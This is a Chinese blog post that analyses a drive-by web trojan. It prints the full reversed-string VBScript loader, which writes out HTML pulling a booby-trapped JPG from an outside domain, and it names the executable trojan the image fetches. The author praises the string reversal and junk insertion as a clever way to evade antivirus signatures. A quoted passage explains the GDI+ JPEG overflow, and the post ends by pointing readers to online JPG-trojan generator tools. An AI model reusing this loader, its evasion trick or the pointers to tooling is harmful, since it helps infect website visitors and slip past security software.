一个倒写的网马程序-星旺坡

管理首页

网马代码,加点注释在里边.
引用内容：
<SCRIPT language=vbscript>
hu="琳>LMTH/<>YDOB/<琳>VID/<>VID/<琳>"")'gpj.1/emag/moc.eveanihc.www//:ptth'(lru :ROSRUC""=elyts VID<琳>YDOB<琳>DAEH/<>ROTARENEG=eman ""9503.0092.00.6 LMTHSM""=tnetnoc ATEM<琳>""5gib=tesrahc lmth/txet""=tnetnoc epyT-tnetnoC=viuqe-ptth ATEM<琳>DAEH<>LMTH<琳"
function UnEncode(cc)
for i = 1 to len(cc)
if mid(cc,i,1)<> "琳" then
temp = Mid(cc, i, 1) + temp
else
temp=vbcrlf&temp
end if
next
UnEncode=temp
end function
document.write(UnEncode(hu))
</SCRIPT>

程序代码： [ 复制代码到剪贴板 ]
hu="琳>LMTH/<>YDOB/<琳>VID/<>VID/<琳>"")'gpj.1/emag/moc.eveanihc.www//:ptth'(lru :ROSRUC""=elyts VID<琳>YDOB<琳>DAEH/<>ROTARENEG=eman ""9503.0092.00.6 LMTHSM""=tnetnoc ATEM<琳>""5gib=tesrahc lmth/txet""=tnetnoc epyT-tnetnoC=viuqe-ptth ATEM<琳>DAEH<>LMTH<琳"
其实这是网马的代码,但一看上去好像是乱码,或是加密的,其实不然.这里就体现了作者的极好思路.
1.用倒着写的方法,可以躲过杀软的特征码定位.
2.同时采用加花的手段,使查杀更加困难.
这两种手法是桌面型黑软的常用手法,但是拿到网马上来用,还真是不错.
程序代码： [ 复制代码到剪贴板 ]
function UnEncode(cc)
for i = 1 to len(cc)
if mid(cc,i,1)<> "琳" then
temp = Mid(cc, i, 1) + temp
else
temp=vbcrlf&temp
end if
next
UnEncode=temp
end function
这个函数就是负责将上边精心组织的网马代码还原用的:
for i = 1 to len(cc) 从头到尾一个一个字节的判断
if mid(cc,i,1)<> "琳" then 如果不是"琳"这个字
temp = Mid(cc, i, 1) + temp 将这个字加到合成的串前边,也就是形成倒序
temp=vbcrlf&temp 否则加个回行符,vbcrlf是VB的回行符
然后输出拼装好的网马代码.

可以看到,问题出在那个1.JPG的图片上.
用UE打开来,可以看到在文件的尾部有这样的字样:
引用内容：
http://www.chinaeve.com/game/index.exe
其实这才是真正的木马.
至于JPG图片是如何成为网马的,请看这里:
http://art.todo.net.cn/html/article/16817.html
引用内容：
图片带毒来袭，实在让所有人都擦了一把汗，然而我们都知道，JPEG、GIF等格式图片不具备可以执行自身并散播病毒的条件，这不符合逻辑。回忆一下2004年9月14日的事，微软发布了MS04-028安全公告：JPEG处理(GDI+)中的缓冲区溢出可能使代码得以执行。没错，就是这个漏洞，它的术语叫GDI+，对应的动态链接库为GdiPlus.dll，这是一种图形设备接口，能够为应用程序和程序员提供二维媒介图形、映像和版式，大部分Windows程序都调用这个DLL完成JPEG格式图片的处理工作。但是现在，正是这个“公众人物”成了众矢之的。
说到这里，有基础的读者应该明白了吧：并不是图片自己能传播病毒，而是系统负责图形处理工作的模块会在处理图片时发生溢出导致图片内携带的恶意指令得以执行破坏。如果某个图片工具不调用这个系统模块，而是使用自己的处理模块，那么同样包含恶意指令的图片就不能达到破坏目的。但是因为这个系统模块是默认的处理模块，所以大部分程序在“JPEG病毒”面前纷纷落马。
http://art.todo.net.cn/html/article/16817.html
这个溢出是怎么产生的呢？这要从系统如何读取JPEG格式图形的原理说起，系统处理一个JPEG图片时，需要在内存里加载JPEG处理模块，然后JPEG处理模块再把图片数据读入它所占据的内存空间里，也就是所说的缓冲区，最后我们就看到了图片的显示，然而就是在图片数据进入缓冲区的这一步出了错——Windows规定了缓冲区的大小，却没有严格检查实际容纳的数据量，这个带缺陷的边界检查模式导致了噩梦：入侵者把一个JPEG图片的数据加工得异常巨大并加入恶意指令，那么这个图片在系统载入内存时候会发生什么情况呢？图片数据会涨满整个JPEG处理模块提供的缓冲区并恰好把恶意指令溢出到程序自身的内存区域，而这部分内存区域是用于执行指令的，即核心区，于是恶意指令被程序误执行了，入侵者破坏系统或入侵机器的行为得以正常实施。有人也许会疑惑，入侵者都是神算子吗，他们为什么能准确的知道会是哪些数据可以溢出执行？答案很简单，因为Windows在分配JPEG处理模块的空间时，给它指定的内存起始地址是固定的，入侵者只要计算好这个空间大小，就能知道会有哪些数据被执行了，所以JPEG病毒迅速传播起来。
所谓JPEG病毒，并不是JPEG图片能放出病毒，而是系统处理JPEG图片的模块自己执行了JPEG图片携带的病毒，所以我们大可不必人心惶惶，只要补上了GDIPLUS.DLL的漏洞，那么即使你机器上的所有JPEG图片都带有病毒数据，它们也无法流窜出来搞破坏，正如美国马萨诸塞州立大学助理教授奥斯汀所言：“病毒不仅仅是可自我复制的代码，他们需要通过可执行代码的方式来进行传播。JPEG文件不能执行代码，他们是由应用软件打开的数据文件。应用软件不会去查找数据文件中的可执行的代码，为此不会运行这些病毒代码。”

那这个图片如何做呢,我们还要去研究什么内存溢出吗？呵呵,不用,网上有现成的工具,能生成JPG木马的工具,百度一下.